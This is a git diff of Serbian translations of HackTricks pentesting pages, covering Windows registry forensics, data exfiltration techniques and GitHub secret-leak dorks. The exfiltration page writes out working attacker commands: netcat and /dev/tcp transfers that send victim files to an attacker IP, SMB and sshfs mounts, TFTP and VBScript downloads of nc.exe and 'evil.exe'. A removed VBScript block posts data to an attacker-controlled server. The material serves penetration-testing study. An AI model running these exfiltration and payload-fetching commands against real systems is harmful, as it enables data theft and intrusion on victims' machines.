-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} - -### **Informacije o Windows verziji i vlasniku** -- Nađite Windows verziju, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način u **`Software\Microsoft\Windows NT\CurrentVersion`**. +### **Informacije o verziji Windowsa i vlasniku** +- Na lokaciji **`Software\Microsoft\Windows NT\CurrentVersion`**, možete pronaći verziju Windowsa, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način. ### **Ime računara** -- Hostname se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**. +- Ime računara se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**. ### **Podešavanje vremenske zone** - Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**. @@ -30,45 +30,45 @@ Drugi načini podrške HackTricks-u: - Podrazumevano, praćenje vremena poslednjeg pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite: `fsutil behavior set disablelastaccess 0` -### Windows verzije i Service Pack-ovi -- **Windows verzija** označava izdanje (npr. Home, Pro) i njeno izdanje (npr. Windows 10, Windows 11), dok **Service Pack-ovi** predstavljaju ažuriranja koja uključuju popravke i ponekad nove funkcije. +### Verzije Windowsa i Service Pack-ovi +- **Verzija Windowsa** označava izdanje (npr. Home, Pro) i njegovo izdanje (npr. Windows 10, Windows 11), dok **Service Pack-ovi** predstavljaju ažuriranja koja uključuju ispravke i ponekad nove funkcije. ### Omogućavanje vremena poslednjeg pristupa - Omogućavanje praćenja vremena poslednjeg pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema. ### Detalji o mrežnim informacijama -- Registar čuva obimne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablove, 3G)** i **kategorije mreže (Javna, Privatna/Domaća, Domen/Radna)**, što je važno za razumevanje postavki mrežne sigurnosti i dozvola. +- Registar čuva obimne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablove, 3G)** i **kategorije mreže (Javna, Privatna/Domaća, Domen/Radna)**, što je od vitalnog značaja za razumevanje postavki bezbednosti mreže i dozvola. -### Klijentsko skladištenje (CSC) -- **CSC** poboljšava pristup datotekama van mreže skladištenjem kopija deljenih datoteka. Različita podešavanja **CSCFlags** kontrolišu kako i koje datoteke se skladište, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom konekcijom. +### Keširanje klijentske strane (CSC) +- **CSC** poboljšava pristup datotekama van mreže keširanjem kopija deljenih datoteka. Različite postavke **CSCFlags** kontrolišu kako i koje datoteke su keširane, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom konekcijom. ### Programi koji se automatski pokreću - Programi navedeni u različitim `Run` i `RunOnce` registarskim ključevima automatski se pokreću prilikom pokretanja sistema, utičući na vreme pokretanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera. ### Shellbags -- **Shellbags** ne samo da čuvaju preferencije za prikaze fascikli, već pružaju i forenzičke dokaze o pristupu fasciklama čak i ako fascikla više ne postoji. Oni su neprocenjivi za istrage, otkrivajući korisničku aktivnost koja nije očigledna na druge načine. +- **Shellbags** ne samo što čuvaju preferencije za prikaze fascikli, već pružaju i forenzičke dokaze o pristupu fasciklama čak i ako fascikla više ne postoji. Oni su neprocenjivi za istrage, otkrivajući aktivnosti korisnika koje nisu očigledne na druge načine. -### Informacije i forenzika o USB uređajima -- Detalji o USB uređajima čuvaju se u registru i mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa prenosom osetljivih datoteka ili incidentima neovlašćenog pristupa. +### USB informacije i forenzika +- Detalji čuvani u registru o USB uređajima mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa prenosom osetljivih datoteka ili incidentima neovlašćenog pristupa. ### Serijski broj zapremine - **Serijski broj zapremine** može biti ključan za praćenje specifične instance sistema datoteka, koristan u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke na različitim uređajima. -### **Detalji o isključivanju** +### **Detalji isključivanja** - Vreme isključivanja i broj (samo za XP) čuvaju se u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**. ### **Konfiguracija mreže** - Za detaljne informacije o mrežnim interfejsima, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- Prvo i poslednje vreme povezivanja na mrežu, uključujući VPN veze, beleže se pod različitim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. +- Prva i poslednja vremena povezivanja na mrežu, uključujući VPN veze, beleže se pod različitim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. ### **Deljeni folderi** -- Deljeni folderi i podešavanja nalaze se pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Podešavanja klijentskog skladištenja (CSC) određuju dostupnost datoteka van mreže. +- Deljeni folderi i podešavanja nalaze se pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Postavke keširanja klijentske strane (CSC) određuju dostupnost datoteka van mreže. ### **Programi koji se automatski pokreću** - Putanje poput **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe postavljene da se pokreću prilikom pokretanja sistema. ### **Pretrage i otkucane putanje** -- Pretrage i otkucane putanje u Explorer-u prate se u registru pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, redom. +- Pretrage i otkucane putanje u Exploreru prate se u registru pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, redom. ### **Nedavni dokumenti i Office datoteke** - Nedavni dokumenti i Office datoteke na koje je pristupano beleže se u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama za verzije Office-a. @@ -76,31 +76,30 @@ Drugi načini podrške HackTricks-u: ### **Nedavno korišćeni (MRU) elementi** - Liste MRU, koje pokazuju nedavne putanje do datoteka i komande, čuvaju se u različitim podključevima `ComDlg32` i `Explorer` pod `NTUSER.DAT`. -### **Pracenje korisničke aktivnosti** -- Funkcija User Assist beleži detaljnu statistiku korišćenja aplikacija, uključujući broj pokretanja i poslednje vreme pokretanja, na putanji **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +### **Pracenje aktivnosti korisnika** +- Funkcija User Assist beleži detaljnu statistiku korišćenja aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na lokaciji **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Analiza Shellbags-a** -- Shellbags, koji otkrivaju detalje o pristupu fasciklama, čuvaju se u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu. +- Shellbags, koji otkrivaju detalje pristupa fasciklama, čuvaju se u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu. ### **Istorija USB uređaja** - **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** i **`HKLM\SYSTEM\ControlSet001\Enum\USB`** sadrže bogate detalje o povezanim USB uređajima, uključujući proizvođača, naziv proizvoda i vremenske oznake povezivanja. - Korisnik povezan sa određenim USB uređajem može se locirati pretragom `NTUSER.DAT` košnica za **{GUID}** uređaja. - Poslednji montirani uređaj i njegov serijski broj zapremine mogu se pratiti kroz `System\MountedDevices` i `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, redom. -Ovaj vodič sažima ključne putanje i metode za pristup detaljnim informacijama o sistemu, mreži i korisničkoj aktivnosti na Windows sistemima, teži ka jasnoći i upotrebljivosti. - +Ovaj vodič sažima ključne putanje i metode za pristup detaljnim informacijama o sistemu, mreži i aktivnostima korisnika na Windows sistemima, teži ka jasnoći i upotrebljivosti. +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index d3fb7bf47..d63d60cbf 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,18 +1,19 @@ # Izfiltracija +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} **Try Hard Security Group** @@ -22,9 +23,9 @@ Drugi načini podrške HackTricks-u: *** -## Često beleženi domeni za izfiltriranje informacija +## Često dozvoljeni domeni za izfiltriranje informacija -Proverite [https://lots-project.com/](https://lots-project.com/) da biste pronašli često beležene domene koje mogu biti zloupotrebljene +Proverite [https://lots-project.com/](https://lots-project.com/) da biste pronašli često dozvoljene domene koje mogu biti zloupotrebljene ## Kopiranje\&lepljenje Base64 @@ -65,7 +66,7 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous ### Postavljanje fajlova * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) -* [**SimpleHttpServer ispisuje GET i POST zahteve (uključujući zaglavlja)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) +* [**SimpleHttpServer koji prikazuje GET i POST zahteve (takođe zaglavlja)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) * Python modul [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files @@ -79,8 +80,6 @@ curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` -### **HTTPS Server** - ### **HTTPS Server** ```python # from https://gist.github.com/dergachev/7028596 @@ -193,51 +192,15 @@ Windows ### Exfiltration -#### Exfiltration Over Alternative Protocol +Kada je reč o izvlačenju podataka sa Windows sistema, postoje različite metode koje se mogu koristiti. Neke od ovih metoda uključuju: -1. **Description** - - Data exfiltration can be achieved using various protocols other than HTTP/HTTPS, such as DNS, ICMP, or SMTP. +1. **Upotreba FTP-a:** Korišćenje FTP klijenta za prenos podataka sa zaraženog sistema na udaljeni server. +2. **Korišćenje Web protokola:** Korišćenje HTTP ili HTTPS protokola za slanje podataka na udaljeni server. +3. **Korišćenje DNS tunela:** Korišćenje DNS saobraćaja za skrivanje podataka i njihovo slanje na udaljeni server. +4. **Korišćenje E-maila:** Slanje podataka putem e-mail poruka. +5. **Korišćenje USB uređaja:** Kopiranje podataka na USB uređaj radi fizičkog iznošenja sa zaraženog sistema. -2. **Detection** - - - Monitor network traffic for unusual DNS requests, especially those containing encoded data. - - Look for abnormal ICMP or SMTP traffic patterns. - - Implement egress filtering to restrict unnecessary outbound traffic. - -3. **Prevention** - - - Use encryption to protect data in transit. - - Implement network segmentation to limit lateral movement. - - Disable unnecessary services and protocols to reduce attack surface. - -4. **Tools** - - - **dnscat2**: A tool for tunneling data through DNS servers. - - **Iodine**: A tool for tunneling IPv4 data through a DNS server. - -#### Exfiltration Over Unencrypted Protocols - -1. **Description** - - Attackers can exfiltrate data over unencrypted protocols like FTP, Telnet, or SNMP. - -2. **Detection** - - - Monitor network traffic for FTP, Telnet, or SNMP connections. - - Look for large amounts of data being transferred over these protocols. - - Implement deep packet inspection to analyze payload contents. - -3. **Prevention** - - - Use secure protocols like SFTP, SSH, or SNMPv3. - - Implement strong authentication mechanisms. - - Encrypt data at rest and in transit. - -4. **Tools** - - - **Wireshark**: A network protocol analyzer for monitoring and analyzing network traffic. - - **Snort**: An open-source network intrusion detection and prevention system. +Svaka od ovih metoda ima svoje prednosti i mane, a izbor odgovarajuće metode zavisi od specifičnih zahteva i okolnosti napada. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials @@ -259,16 +222,14 @@ sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` -## NC - -NC (Netcat) je moćan alat za mrežno programiranje koji se često koristi za prenos podataka između sistema putem mreže. Može se koristiti za izvršavanje različitih zadataka, uključujući i eksfiltraciju podataka. +## Mrežni kanal ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` ## /dev/tcp -### Preuzimanje fajla sa žrtvine mašine +### Preuzimanje fajla sa žrtve ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim @@ -302,15 +263,15 @@ sniff(iface="tun0", prn=process_packet) ``` ## **SMTP** -Ako možete slati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a: +Ako možete poslati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a: ```bash sudo python -m smtpd -n -c DebuggingServer :25 ``` ## TFTP -Podrazumevano u XP i 2003 (u drugima mora biti eksplicitno dodato tokom instalacije) +Podrazumevano u XP i 2003 (u drugima ga je potrebno eksplicitno dodati tokom instalacije) -Na Kali, **pokreni TFTP server**: +Na Kali, **pokrenite TFTP server**: ```bash #I didn't get this options working and I prefer the python option mkdir /tftp @@ -322,7 +283,7 @@ cp /path/tp/nc.exe /tftp pip install ptftpd ptftpd -p 69 tap0 . # ptftp -p ``` -Na **žrtvu**, povežite se sa Kali serverom: +U **žrtva**, povežite se sa Kali serverom: ```bash tftp -i get nc.exe ``` @@ -333,55 +294,6 @@ Preuzmite fajl pomoću PHP jednolinijske komande: echo "" > down2.php ``` ## VBScript - -### VBScript Exfiltration Techniques - -VBScript can be used to exfiltrate data from a compromised system. Below are some common techniques: - -1. **Writing to Files**: VBScript can write data to a file on the system, which can then be exfiltrated using various methods. - -2. **Sending Emails**: VBScript can be used to send emails with the exfiltrated data as attachments or within the email body. - -3. **HTTP Requests**: VBScript can make HTTP requests to an external server controlled by the attacker to exfiltrate data. - -4. **DNS Requests**: VBScript can make DNS requests with encoded data to exfiltrate information. - -### Example VBScript Exfiltration Code - -```vbscript -' Example VBScript code for exfiltrating data - -' Write data to a file -Set objFSO = CreateObject("Scripting.FileSystemObject") -Set objFile = objFSO.CreateTextFile("C:\exfiltrated_data.txt", True) -objFile.Write "Sensitive data to exfiltrate" -objFile.Close - -' Send an email -Set objEmail = CreateObject("CDO.Message") -objEmail.From = "attacker@example.com" -objEmail.To = "recipient@example.com" -objEmail.Subject = "Exfiltrated Data" -objEmail.TextBody = "Attached is the exfiltrated data." -objEmail.AddAttachment "C:\exfiltrated_data.txt" -objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 -objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.example.com" -objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 -objEmail.Configuration.Fields.Update -objEmail.Send - -' Make an HTTP request -Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP") -objHTTP.Open "GET", "http://attacker-controlled-server.com/exfiltrate.php?data=exfiltrated_data", False -objHTTP.Send - -' Make a DNS request -Set objDNS = CreateObject("MSXML2.ServerXMLHTTP") -objDNS.Open "GET", "http://attacker-controlled-dns.com", False -objDNS.Send -``` - -These are just a few examples of how VBScript can be used for exfiltration. It is important to note that using VBScript for malicious purposes is illegal and unethical. ```bash Attacker> python -m SimpleHTTPServer 80 ``` @@ -419,7 +331,7 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` ## Debug.exe -Program `debug.exe` ne samo što omogućava inspekciju binarnih fajlova već takođe ima **mogućnost da ih rekonstruiše iz heksadecimalnog koda**. To znači da, pružajući heksadecimalni kod binarnog fajla, `debug.exe` može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima **ograničenje u sastavljanju fajlova do veličine od 64 kb**. +Program `debug.exe` ne samo što omogućava inspekciju binarnih fajlova već takođe ima **mogućnost da ih rekonstruiše iz heksadecimalnog oblika**. To znači da, pružajući heksadecimalni oblik binarnog fajla, `debug.exe` može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima **ograničenje u sastavljanju fajlova do 64 kb veličine**. ```bash # Reduce the size upx -9 nc.exe @@ -428,3 +340,24 @@ wine exe2bat.exe nc.exe nc.txt ## DNS * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Podržite HackTricks + +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 1b7e7a591..c4fbf1b54 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -1,31 +1,32 @@ -# Github Dorks & Leaks +# Github Dorks & Procure + +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje: [**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini da podržite HackTricks: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} \ -**Bug bounty savet**: **registrujte se** za **Intigriti**, premium **platformu za bug bounty kreiranu od strane hakera, za hakere**! Pridružite nam se na [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) danas i počnite da zarađujete nagrade do **$100,000**! +**Bug bounty savet**: **registrujte se** za **Intigriti**, premium **bug bounty platformu kreiranu od hakera, za hakere**! Pridružite nam se na [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) danas, i počnite da zarađujete nagrade do **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -Sada kada smo napravili listu resursa u našem opsegu, vreme je da tražimo neke niske plodove OSINT-a. +Sada kada smo napravili listu resursa u našem opsegu, vreme je da tražimo neke OSINT niske plodove. -### Platforme koje su već pretraživale za procure +### Platforme koje su već pretraživale procure * [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) -### Procure API ključeva na Github-u +### Procure ključeva API-ja na github-u * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) @@ -321,16 +322,17 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index f82b776ef..a8ba6edfc 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,18 +1,19 @@ # Široka pretraga izvornog koda +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**Porodičnu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje 